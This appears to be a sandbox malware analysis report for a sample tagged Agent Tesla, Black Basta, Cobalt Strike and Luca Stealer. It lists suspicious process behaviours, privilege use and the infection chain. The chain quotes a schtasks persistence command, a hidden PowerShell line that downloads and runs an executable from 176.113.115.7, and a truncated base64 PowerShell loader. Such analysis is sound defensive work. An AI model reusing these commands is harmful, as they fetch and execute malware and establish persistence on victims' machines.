Key created	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings	rapes.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3360	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4692	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1784	powershell.exe
1784	powershell.exe
5896	TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE
5896	TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE
6028	rapes.exe
6028	rapes.exe
4184	7233a9ab97.exe
4184	7233a9ab97.exe
4304	001110901b.exe
4304	001110901b.exe
5344	MSBuild.exe
5344	MSBuild.exe
5344	MSBuild.exe
5344	MSBuild.exe
3620	rapes.exe
3620	rapes.exe
4692	powershell.exe
4692	powershell.exe
4692	powershell.exe
4848	powershell.exe
4848	powershell.exe
4848	powershell.exe
3340	MSBuild.exe
3340	MSBuild.exe
3340	MSBuild.exe
3340	MSBuild.exe
3844	fontdrvhost.exe
3844	fontdrvhost.exe
3844	fontdrvhost.exe
3844	fontdrvhost.exe
3852	Rm3cVPI.exe
3852	Rm3cVPI.exe
3852	Rm3cVPI.exe
3852	Rm3cVPI.exe
1172	powershell.exe
1172	powershell.exe
1172	powershell.exe
1232	Passwords.com
1232	Passwords.com
1232	Passwords.com
1232	Passwords.com
1232	Passwords.com
1232	Passwords.com
3348	b27646bfd0.exe
3348	b27646bfd0.exe
6152	MSBuild.exe
6152	MSBuild.exe
6152	MSBuild.exe
6152	MSBuild.exe
1232	Passwords.com
1232	Passwords.com
1232	Passwords.com
1232	Passwords.com
6624	c12c863c84.exe
6624	c12c863c84.exe
6624	c12c863c84.exe
6624	c12c863c84.exe
6624	c12c863c84.exe
6624	c12c863c84.exe
6792	rapes.exe
6792	rapes.exe
2736	b64e32f6b4.exe
2736	b64e32f6b4.exe
2736	b64e32f6b4.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe
8504	350ea713.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
5596	u75a1_003.exe
5596	u75a1_003.exe
5596	u75a1_003.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

description	pid	Process
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	4692	powershell.exe
Token: SeDebugPrivilege	4848	powershell.exe
Token: SeDebugPrivilege	1172	powershell.exe
Token: SeDebugPrivilege	3192	tasklist.exe
Token: SeDebugPrivilege	3164	tasklist.exe
Token: SeDebugPrivilege	8504	350ea713.exe
Token: SeBackupPrivilege	8504	350ea713.exe
Token: SeRestorePrivilege	8504	350ea713.exe
Token: SeLoadDriverPrivilege	8504	350ea713.exe
Token: SeShutdownPrivilege	8504	350ea713.exe
Token: SeSystemEnvironmentPrivilege	8504	350ea713.exe
Token: SeSecurityPrivilege	8504	350ea713.exe
Token: SeBackupPrivilege	8504	350ea713.exe
Token: SeRestorePrivilege	8504	350ea713.exe
Token: SeDebugPrivilege	8504	350ea713.exe
Token: SeSystemEnvironmentPrivilege	8504	350ea713.exe
Token: SeSecurityPrivilege	8504	350ea713.exe
Token: SeCreatePermanentPrivilege	8504	350ea713.exe
Token: SeShutdownPrivilege	8504	350ea713.exe
Token: SeLoadDriverPrivilege	8504	350ea713.exe
Token: SeIncreaseQuotaPrivilege	8504	350ea713.exe
Token: SeSecurityPrivilege	8504	350ea713.exe
Token: SeSystemProfilePrivilege	8504	350ea713.exe
Token: SeDebugPrivilege	8504	350ea713.exe
Token: SeMachineAccountPrivilege	8504	350ea713.exe
Token: SeCreateTokenPrivilege	8504	350ea713.exe
Token: SeAssignPrimaryTokenPrivilege	8504	350ea713.exe
Token: SeTcbPrivilege	8504	350ea713.exe
Token: SeAuditPrivilege	8504	350ea713.exe
Token: SeSystemEnvironmentPrivilege	8504	350ea713.exe
Token: SeLoadDriverPrivilege	8504	350ea713.exe
Token: SeLoadDriverPrivilege	8504	350ea713.exe
Token: SeIncreaseQuotaPrivilege	8504	350ea713.exe
Token: SeSecurityPrivilege	8504	350ea713.exe
Token: SeSystemProfilePrivilege	8504	350ea713.exe
Token: SeDebugPrivilege	8504	350ea713.exe
Token: SeMachineAccountPrivilege	8504	350ea713.exe
Token: SeCreateTokenPrivilege	8504	350ea713.exe
Token: SeAssignPrimaryTokenPrivilege	8504	350ea713.exe
Token: SeTcbPrivilege	8504	350ea713.exe
Token: SeAuditPrivilege	8504	350ea713.exe
Token: SeSystemEnvironmentPrivilege	8504	350ea713.exe
Token: SeDebugPrivilege	11404	taskkill.exe
Token: SeDebugPrivilege	12192	taskkill.exe
Token: SeDebugPrivilege	2356	taskkill.exe
Token: SeDebugPrivilege	1000	taskkill.exe
Token: SeDebugPrivilege	1832	taskkill.exe
Token: SeDebugPrivilege	1376	firefox.exe
Token: SeDebugPrivilege	1376	firefox.exe
Token: SeDebugPrivilege	7528	cbe2fbdc64.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
1528	2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1528	2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1528	2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1232	Passwords.com
1232	Passwords.com
1232	Passwords.com
11148	101b264521.exe
11148	101b264521.exe
11148	101b264521.exe
11148	101b264521.exe
11148	101b264521.exe
11148	101b264521.exe
11148	101b264521.exe
11148	101b264521.exe
1376	firefox.exe
11148	101b264521.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
11148	101b264521.exe
11148	101b264521.exe
1376	firefox.exe

Suspicious use of SendNotifyMessage 29 IoCs

pid	Process
1528	2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1528	2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1528	2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1232	Passwords.com
1232	Passwords.com
1232	Passwords.com
11148	101b264521.exe
11148	101b264521.exe
11148	101b264521.exe
11148	101b264521.exe
11148	101b264521.exe
11148	101b264521.exe
11148	101b264521.exe
11148	101b264521.exe
11148	101b264521.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
1376	firefox.exe
11148	101b264521.exe
11148	101b264521.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1376	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1528 wrote to memory of 1992	1528	2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1528 wrote to memory of 1992	1528	2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1528 wrote to memory of 1992	1528	2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 1528 wrote to memory of 3824	1528	2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 1528 wrote to memory of 3824	1528	2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 1528 wrote to memory of 3824	1528	2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 1992 wrote to memory of 3360	1992	cmd.exe	90
PID 1992 wrote to memory of 3360	1992	cmd.exe	90
PID 1992 wrote to memory of 3360	1992	cmd.exe	90
PID 3824 wrote to memory of 1784	3824	mshta.exe	94
PID 3824 wrote to memory of 1784	3824	mshta.exe	94
PID 3824 wrote to memory of 1784	3824	mshta.exe	94
PID 1784 wrote to memory of 5896	1784	powershell.exe	100
PID 1784 wrote to memory of 5896	1784	powershell.exe	100
PID 1784 wrote to memory of 5896	1784	powershell.exe	100
PID 5896 wrote to memory of 6028	5896	TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE	101
PID 5896 wrote to memory of 6028	5896	TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE	101
PID 5896 wrote to memory of 6028	5896	TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE	101
PID 6028 wrote to memory of 2424	6028	rapes.exe	105
PID 6028 wrote to memory of 2424	6028	rapes.exe	105
PID 6028 wrote to memory of 2424	6028	rapes.exe	105
PID 6028 wrote to memory of 4184	6028	rapes.exe	106
PID 6028 wrote to memory of 4184	6028	rapes.exe	106
PID 6028 wrote to memory of 4184	6028	rapes.exe	106
PID 4184 wrote to memory of 1276	4184	7233a9ab97.exe	107
PID 4184 wrote to memory of 1276	4184	7233a9ab97.exe	107
PID 4184 wrote to memory of 1276	4184	7233a9ab97.exe	107
PID 4184 wrote to memory of 1276	4184	7233a9ab97.exe	107
PID 4184 wrote to memory of 1276	4184	7233a9ab97.exe	107
PID 4184 wrote to memory of 1276	4184	7233a9ab97.exe	107
PID 4184 wrote to memory of 1276	4184	7233a9ab97.exe	107
PID 4184 wrote to memory of 1276	4184	7233a9ab97.exe	107
PID 4184 wrote to memory of 1276	4184	7233a9ab97.exe	107
PID 6028 wrote to memory of 4304	6028	rapes.exe	109
PID 6028 wrote to memory of 4304	6028	rapes.exe	109
PID 6028 wrote to memory of 4304	6028	rapes.exe	109
PID 4304 wrote to memory of 208	4304	001110901b.exe	110
PID 4304 wrote to memory of 208	4304	001110901b.exe	110
PID 4304 wrote to memory of 208	4304	001110901b.exe	110
PID 4304 wrote to memory of 208	4304	001110901b.exe	110
PID 4304 wrote to memory of 208	4304	001110901b.exe	110
PID 4304 wrote to memory of 208	4304	001110901b.exe	110
PID 4304 wrote to memory of 208	4304	001110901b.exe	110
PID 4304 wrote to memory of 208	4304	001110901b.exe	110
PID 4304 wrote to memory of 208	4304	001110901b.exe	110
PID 6028 wrote to memory of 1028	6028	rapes.exe	112
PID 6028 wrote to memory of 1028	6028	rapes.exe	112
PID 1028 wrote to memory of 5344	1028	ee4dd30ae4.exe	114
PID 1028 wrote to memory of 5344	1028	ee4dd30ae4.exe	114
PID 1028 wrote to memory of 5344	1028	ee4dd30ae4.exe	114
PID 1028 wrote to memory of 5344	1028	ee4dd30ae4.exe	114
PID 1028 wrote to memory of 5344	1028	ee4dd30ae4.exe	114
PID 1028 wrote to memory of 5344	1028	ee4dd30ae4.exe	114
PID 1028 wrote to memory of 5344	1028	ee4dd30ae4.exe	114
PID 1028 wrote to memory of 5344	1028	ee4dd30ae4.exe	114
PID 1028 wrote to memory of 5344	1028	ee4dd30ae4.exe	114
PID 6028 wrote to memory of 3392	6028	rapes.exe	118
PID 6028 wrote to memory of 3392	6028	rapes.exe	118
PID 3392 wrote to memory of 1496	3392	kO2IdCz.exe	119
PID 3392 wrote to memory of 1496	3392	kO2IdCz.exe	119
PID 3260 wrote to memory of 2336	3260	cmd.exe	123
PID 3260 wrote to memory of 2336	3260	cmd.exe	123
PID 1496 wrote to memory of 5668	1496	cmd.exe	124
PID 1496 wrote to memory of 5668	1496	cmd.exe	124

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2600
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3844

C:\Users\Admin\AppData\Local\Temp\2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1528
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn XYfPOmaUGbK /tr "mshta C:\Users\Admin\AppData\Local\Temp\CToBlDc5D.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1992
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn XYfPOmaUGbK /tr "mshta C:\Users\Admin\AppData\Local\Temp\CToBlDc5D.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3360
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\CToBlDc5D.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3824
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1784
  - - C:\Users\Admin\AppData\Local\TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE
      "C:\Users\Admin\AppData\Local\TempMFW7DLIBB34XRH3WQMNSSDW4KYXNEDKS.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5896
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:6028
      - C:\Users\Admin\AppData\Local\Temp\10381710101\825212ef2a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381710101\825212ef2a.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2424
      - C:\Users\Admin\AppData\Local\Temp\10381720101\7233a9ab97.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381720101\7233a9ab97.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4184
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381720101\7233a9ab97.exe"
        7⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1276
      - C:\Users\Admin\AppData\Local\Temp\10381730101\001110901b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381730101\001110901b.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381730101\001110901b.exe"
        7⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:208
      - C:\Users\Admin\AppData\Local\Temp\10381740101\ee4dd30ae4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381740101\ee4dd30ae4.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1028
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5344
      - C:\Users\Admin\AppData\Local\Temp\10381750101\kO2IdCz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381750101\kO2IdCz.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:3392
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c 67e8f4de3ad1d.vbs
        7⤵
        Checks computer location settings
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:1496
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"
        8⤵
        
        PID:5668
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10381761121\5YB5L4K.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4868
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10381761121\5YB5L4K.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:6080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3